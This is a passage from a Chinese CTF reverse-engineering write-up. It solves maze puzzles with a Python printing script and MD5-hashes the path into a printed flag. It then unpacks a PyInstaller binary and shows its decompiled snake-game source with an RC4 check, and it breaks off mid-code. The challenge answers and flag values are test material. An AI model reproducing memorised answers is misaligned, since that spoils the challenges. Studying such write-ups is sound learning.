class="number">1</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">4</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">3</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">4</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">3</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">4</span>, <span class="number">0</span>, <span class="number">0</span>]</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">45</span>):</span><br><span class="line"> <span class="keyword">for</span> j <span class="keyword">in</span> range(<span class="number">15</span>):</span><br><span class="line"> <span class="keyword">if</span> aMap[i*<span class="number">15</span>+j]==<span class="number">0</span>:</span><br><span class="line"> tmp=<span class="string">'*'</span></span><br><span class="line"> <span class="keyword">elif</span> aMap[i*<span class="number">15</span>+j]==<span class="number">1</span>:</span><br><span class="line"> tmp=<span class="string">'.'</span></span><br><span class="line"> <span class="keyword">elif</span> aMap[i*<span class="number">15</span>+j]==<span class="number">3</span>:</span><br><span class="line"> tmp=<span class="string">'@'</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> tmp=<span class="string">'#'</span></span><br><span class="line"> print(tmp,end=<span class="string">''</span>)</span><br><span class="line"> print()</span><br><span class="line"> <span class="keyword">if</span> i==<span class="number">14</span> <span class="keyword">or</span> i==<span class="number">29</span>:</span><br><span class="line"> print()</span><br></pre></td></tr></table></figure></div><p>可以看到打印出了三个迷宫,为了看得清楚所以选用几个特定字符打印。</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line">.....**********</span><br><span class="line">.....*@*.******</span><br><span class="line">.....*.*.******</span><br><span class="line">.....*.*.******</span><br><span class="line">.....*.*.....**</span><br><span class="line">.....*.*****.**</span><br><span class="line">.....*.*****.**</span><br><span class="line">.....*.*****..*</span><br><span class="line">.....*........*</span><br><span class="line">.....********<span class="comment">#*</span></span><br><span class="line">...............</span><br><span class="line">...............</span><br><span class="line">...............</span><br><span class="line">...............</span><br><span class="line">...............</span><br><span class="line"><span class="comment">#sssssssddddddds</span></span><br><span class="line"></span><br><span class="line">..*************</span><br><span class="line">..*@*....******</span><br><span class="line">..*.****.******</span><br><span class="line">..*.****.******</span><br><span class="line">..*..***.....**</span><br><span class="line">..*..*******.**</span><br><span class="line">..*..*******.**</span><br><span class="line">..*..*****....*</span><br><span class="line">..*..*****.**.*</span><br><span class="line">..*..*****.****</span><br><span class="line">..*......*.*..*</span><br><span class="line">..*...........*</span><br><span class="line">..***********<span class="comment">#*</span></span><br><span class="line">...............</span><br><span class="line">...............</span><br><span class="line"><span class="comment">#ssssssssssdddddddddds</span></span><br><span class="line"></span><br><span class="line">***************</span><br><span class="line">*@..***********</span><br><span class="line">***.*...*******</span><br><span class="line">***...*.*******</span><br><span class="line">****.**.*******</span><br><span class="line">*..*.**.*******</span><br><span class="line">**...**.*******</span><br><span class="line">*******.*******</span><br><span class="line">*******....****</span><br><span class="line">**********.****</span><br><span class="line">**********.****</span><br><span class="line">**********.****</span><br><span class="line">**********....*</span><br><span class="line">*************.*</span><br><span class="line">*************<span class="comment">#*</span></span><br><span class="line"><span class="comment">#ddssddwddssssssdddssssdddss</span></span><br></pre></td></tr></table></figure></div><p>走迷宫,然后把路径拼起来,根据提示转md5,get flag。</p><p>(有个疑惑哈,第二个迷宫理论上说就算是最短路也有多解?是题目出锅了还是我哪里看漏了= =</p><p>(再补一句,题目似乎甚至没要求最短路???神奇.jpg</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/GUHrwkIqbS7dFmM.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">import</span> hashlib</span><br><span class="line">s=<span class="string">b"sssssssdddddddsssssssssssddddddddddsddssddwddssssssdddssssdddss"</span></span><br><span class="line">print(<span class="string">"flag{%s}"</span>%hashlib.md5(s).hexdigest())</span><br></pre></td></tr></table></figure></div><p><strong>flag{999ea6aa6c365ab43eec2a0f0e5968d5}</strong></p><h2 id="pypy"><a href="#pypy" class="headerlink" title="pypy"></a>pypy</h2><p>把题目文件拖进ida,搜索字符串能看到</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/pxy1fbNYldmPA4M.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>猜测是pyinstaller打包的文件。</p><blockquote><p>也就是这个题让我突然发现pyinstaller还能打包成elf的,于是比赛结束以后赶紧把之前总结的解包指南更新了:<a href="https://c10udlnk.top/2020/12/04/reSkillsOn-Pyinstaller-extracted-to-python/" target="_blank" rel="noopener">RE套路 - 关于pyinstaller打包文件的复原 | c10udlnk_Log</a>。</p></blockquote><p>走流程解包,得到python源码。</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/WFGf3lxitCeHn4L.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>看到这种混淆变量名,果断替换成ida style变量名(。</p><p>放一下源码:</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="C"><figure class="iseeu highlight /c"><table><tr><td class="code"><pre><span class="line"># uncompyle6 version <span class="number">3.7</span><span class="number">.4</span></span><br><span class="line"># Python bytecode <span class="number">3.8</span> (<span class="number">3413</span>)</span><br><span class="line"># Decompiled from: Python <span class="number">2.7</span><span class="number">.18</span> (v2<span class="number">.7</span><span class="number">.18</span>:<span class="number">8</span>d21aa21f2, Apr <span class="number">20</span> <span class="number">2020</span>, <span class="number">13</span>:<span class="number">25</span>:<span class="number">05</span>) [MSC v<span class="number">.1500</span> <span class="number">64</span> <span class="built_in">bit</span> (AMD64)]</span><br><span class="line"># Warning: <span class="keyword">this</span> version of Python has problems handling the Python <span class="number">3</span> <span class="string">"byte"</span> type in constants properly.</span><br><span class="line"></span><br><span class="line"># Embedded file name: main.py</span><br><span class="line"># Compiled at: <span class="number">1995</span><span class="number">-09</span><span class="number">-28</span> <span class="number">00</span>:<span class="number">18</span>:<span class="number">56</span></span><br><span class="line"># Size of source mod <span class="number">2</span>**<span class="number">32</span>: <span class="number">257</span> bytes</span><br><span class="line"><span class="keyword">import</span> <span class="built_in">random</span>, codecs, sys, time, pygame</span><br><span class="line">from pygame.locals <span class="keyword">import</span> *</span><br><span class="line">from collections <span class="keyword">import</span> <span class="built_in">deque</span></span><br><span class="line">SCREEN_WIDTH = <span class="number">600</span></span><br><span class="line">SCREEN_HEIGHT = <span class="number">480</span></span><br><span class="line">SIZE = <span class="number">20</span></span><br><span class="line">LINE_WIDTH = <span class="number">1</span></span><br><span class="line">flag = 'flag{this is a fake flag}'</span><br><span class="line">SCOPE_X = (<span class="number">0</span>, SCREEN_WIDTH <span class="comment">// SIZE - 1)</span></span><br><span class="line">SCOPE_Y = (<span class="number">2</span>, SCREEN_HEIGHT <span class="comment">// SIZE - 1)</span></span><br><span class="line">FOOD_STYLE_LIST = [(<span class="number">10</span>, (<span class="number">255</span>, <span class="number">100</span>, <span class="number">100</span>)), (<span class="number">20</span>, (<span class="number">100</span>, <span class="number">255</span>, <span class="number">100</span>)), (<span class="number">30</span>, (<span class="number">100</span>, <span class="number">100</span>, <span class="number">255</span>))]</span><br><span class="line">LIGHT = (<span class="number">100</span>, <span class="number">100</span>, <span class="number">100</span>)</span><br><span class="line">DARK = (<span class="number">200</span>, <span class="number">200</span>, <span class="number">200</span>)</span><br><span class="line">BLACK = (<span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>)</span><br><span class="line">RED = (<span class="number">200</span>, <span class="number">30</span>, <span class="number">30</span>)</span><br><span class="line">BGCOLOR = (<span class="number">40</span>, <span class="number">40</span>, <span class="number">60</span>)</span><br><span class="line"></span><br><span class="line">def print_text(v1, v2, v3, v4, v5, fcolor=(<span class="number">255</span>, <span class="number">255</span>, <span class="number">255</span>)):</span><br><span class="line"> v6 = v2.render(v5, True, fcolor)</span><br><span class="line"> v1.blit(v6, (v3, v4))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">def init_snake():</span><br><span class="line"> v7 = <span class="built_in">deque</span>()</span><br><span class="line"> v7.append((<span class="number">2</span>, SCOPE_Y[<span class="number">0</span>]))</span><br><span class="line"> v7.append((<span class="number">1</span>, SCOPE_Y[<span class="number">0</span>]))</span><br><span class="line"> v7.append((<span class="number">0</span>, SCOPE_Y[<span class="number">0</span>]))</span><br><span class="line"> <span class="keyword">return</span> v7</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">def create_food(v8):</span><br><span class="line"> v9 = <span class="built_in">random</span>.randint(SCOPE_X[<span class="number">0</span>], SCOPE_X[<span class="number">1</span>])</span><br><span class="line"> v10 = <span class="built_in">random</span>.randint(SCOPE_Y[<span class="number">0</span>], SCOPE_Y[<span class="number">1</span>])</span><br><span class="line"> <span class="keyword">while</span> (v9, v10) in v8:</span><br><span class="line"> v9 = <span class="built_in">random</span>.randint(SCOPE_X[<span class="number">0</span>], SCOPE_X[<span class="number">1</span>])</span><br><span class="line"> v10 = <span class="built_in">random</span>.randint(SCOPE_Y[<span class="number">0</span>], SCOPE_Y[<span class="number">1</span>])</span><br><span class="line"></span><br><span class="line"> <span class="keyword">return</span> (</span><br><span class="line"> v9, v10)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">def get_food_style():</span><br><span class="line"> <span class="keyword">return</span> FOOD_STYLE_LIST[<span class="built_in">random</span>.randint(<span class="number">0</span>, <span class="number">2</span>)]</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">DEFAULT_KEY = u'Y\xf3\x02\xc3%\x9a\x820\x0b\xbb%\x7f~;\xd2\xdc'</span><br><span class="line"></span><br><span class="line"><span class="function">def <span class="title">rc4</span><span class="params">(v11, key=DEFAULT_KEY, skip=<span class="number">1024</span>)</span>:</span></span><br><span class="line"><span class="function"> v12 </span>= <span class="number">0</span></span><br><span class="line"> v13 = bytearray([v14 <span class="keyword">for</span> v14 in range(<span class="number">256</span>)])</span><br><span class="line"> v12 = <span class="number">0</span></span><br><span class="line"> <span class="keyword">for</span> v15 in range(<span class="number">256</span>):</span><br><span class="line"> v12 = (v12 + v13[v15] + ord(key[(v15 % len(key))])) % <span class="number">256</span></span><br><span class="line"> v16 = v13[v15]</span><br><span class="line"> v17 = v13[v12]</span><br><span class="line"> v13[v15] = v13[v12]</span><br><span class="line"> v13[v12] = v16</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> v12 = <span class="number">0</span></span><br><span class="line"> v18 = <span class="number">0</span></span><br><span class="line"> v19 = []</span><br><span class="line"> <span class="keyword">if</span> skip > <span class="number">0</span>:</span><br><span class="line"> <span class="keyword">for</span> v15 in range(skip):</span><br><span class="line"> v12 = (v12 + <span class="number">1</span>) % <span class="number">256</span></span><br><span class="line"> v18 = (v18 + v13[v12]) % <span class="number">256</span></span><br><span class="line"> v13[v12], v13[v18] = v13[v18], v13[v12]</span><br><span class="line"></span><br><span class="line"> <span class="keyword">for</span> v20 in v11:</span><br><span class="line"> v12 = (v12 + <span class="number">1</span>) % <span class="number">256</span></span><br><span class="line"> v18 = (v18 + v13[v12]) % <span class="number">256</span></span><br><span class="line"> v13[v12], v13[v18] = v13[v18], v13[v12]</span><br><span class="line"> v21 = v13[((v13[v12] + v13[v18]) % <span class="number">256</span>)]</span><br><span class="line"> v19.append(chr(ord(v20) ^ v21))</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> return ''.join(v19)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function">def <span class="title">func</span><span class="params">(v22)</span>:</span></span><br><span class="line"><span class="function"> v23 </span>= rc4(v22)</span><br><span class="line"> if v23.encode('utf-8').hex() == '275b39c381c28b701ac3972338456022c2ba06c3b04f5501471c47c38ac380c29b72c3b5c38a7ec2a5c2a0':</span><br><span class="line"> return 'YOU WIN'</span><br><span class="line"> return 'YOU LOSE'</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function">def <span class="title">main</span><span class="params">()</span>:</span></span><br><span class="line"> pygame.init()</span><br><span class="line"> v24 = pygame.<span class="built_in">display</span>.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))</span><br><span class="line"> pygame.display.set_caption(u'\u8d2a\u5403\u86c7')</span><br><span class="line"> v25 = pygame.font.SysFont('SimHei', 24)</span><br><span class="line"> v26 = pygame.font.Font(None, <span class="number">72</span>)</span><br><span class="line"> v27, v28 = v26.size('GAME OVER')</span><br><span class="line"> v29 = True</span><br><span class="line"> v30 = init_snake()</span><br><span class="line"> v31 = create_food(v30)</span><br><span class="line"> v32 = get_food_style()</span><br><span class="line"> v33 = (<span class="number">1</span>, <span class="number">0</span>)</span><br><span class="line"> v34 = True</span><br><span class="line"> v35 = False</span><br><span class="line"> v36 = <span class="number">0</span></span><br><span class="line"> v37 = <span class="number">0.5</span></span><br><span class="line"> v38 = v37</span><br><span class="line"> v39 = None</span><br><span class="line"> v41 = False</span><br><span class="line"> <span class="keyword">for</span> v40 in pygame.event.<span class="built_in">get</span>():</span><br><span class="line"> <span class="keyword">if</span> v40.type == QUIT:</span><br><span class="line"> sys.<span class="built_in">exit</span>()</span><br><span class="line"> elif v40.type == KEYDOWN:</span><br><span class="line"> <span class="keyword">if</span> v40.key == K_RETURN:</span><br><span class="line"> <span class="keyword">if</span> v34:</span><br><span class="line"> v35 = True</span><br><span class="line"> v34 = False</span><br><span class="line"> v29 = True</span><br><span class="line"> v30 = init_snake()</span><br><span class="line"> v31 = create_food(v30)</span><br><span class="line"> v32 = get_food_style()</span><br><span class="line"> v33 = (<span class="number">1</span>, <span class="number">0</span>)</span><br><span class="line"> v36 = <span class="number">0</span></span><br><span class="line"> v39 = time.time()</span><br><span class="line"> elif v40.key == K_SPACE:</span><br><span class="line"> <span class="keyword">if</span> <span class="keyword">not</span> v34:</span><br><span class="line"> v41 = <span class="keyword">not</span> v41</span><br><span class="line"> elif v40.key in (K_w, K_UP):</span><br><span class="line"> <span class="keyword">if</span> v29:</span><br><span class="line"> v33 = v33[<span class="number">1</span>] <span class="keyword">or</span> (<span class="number">0</span>, <span class="number">-1</span>)</span><br><span class="line"> v29 = False</span><br><span class="line"> elif v40.key in (K_s, K_DOWN):</span><br><span class="line"> <span class="keyword">if</span> v29:</span><br><span class="line"> v33 = v33[<span class="number">1</span>] <span class="keyword">or</span> (<span class="number">0</span>, <span class="number">1</span>)</span><br><span class="line"> v29 = False</span><br><span class="line"> elif v40.key in (K_a, K_LEFT):</span><br><span class="line"> <span class="keyword">if</span> v29:</span><br><span class="line"> <span class="keyword">if</span> <span class="keyword">not</span> v33[<span class="number">0</span>]:</span><br><span class="line"> v33 = (<span class="number">-1</span>, <span class="number">0</span>)</span><br><span class="line"> v29 = False</span><br><span class="line"> elif v40.key in (K_d, K_RIGHT):</span><br><span class="line"> <span class="keyword">if</span> v29:</span><br><span class="line"> <span class="keyword">if</span> <span class="keyword">not</span> v33[<span class="number">0</span>]:</span><br><span class="line"> v33 = (<span class="number">1</span>, <span class="number">0</span>)</span><br><span class="line"> v29 = False</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> v24.<span class="built_in">fill</span>(BGCOLOR)</span><br><span class="line"> <span class="keyword">for</span> v42 in range(SIZE, SCREEN_WIDTH, SIZE):</span><br><span class="line"> pygame.draw.<span class="built_in">line</span>(v24, BLACK, (v42, SCOPE_Y[<span class="number">0</span>] * SIZE), (v42, SCREEN_HEIGHT), LINE_WIDTH)</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">for</span> v43 in range(SCOPE_Y[<span class="number">0</span>] * SIZE, SCREEN_HEIGHT, SIZE):</span><br><span class="line"> pygame.draw.<span class="built_in">line</span>(v24, BLACK, 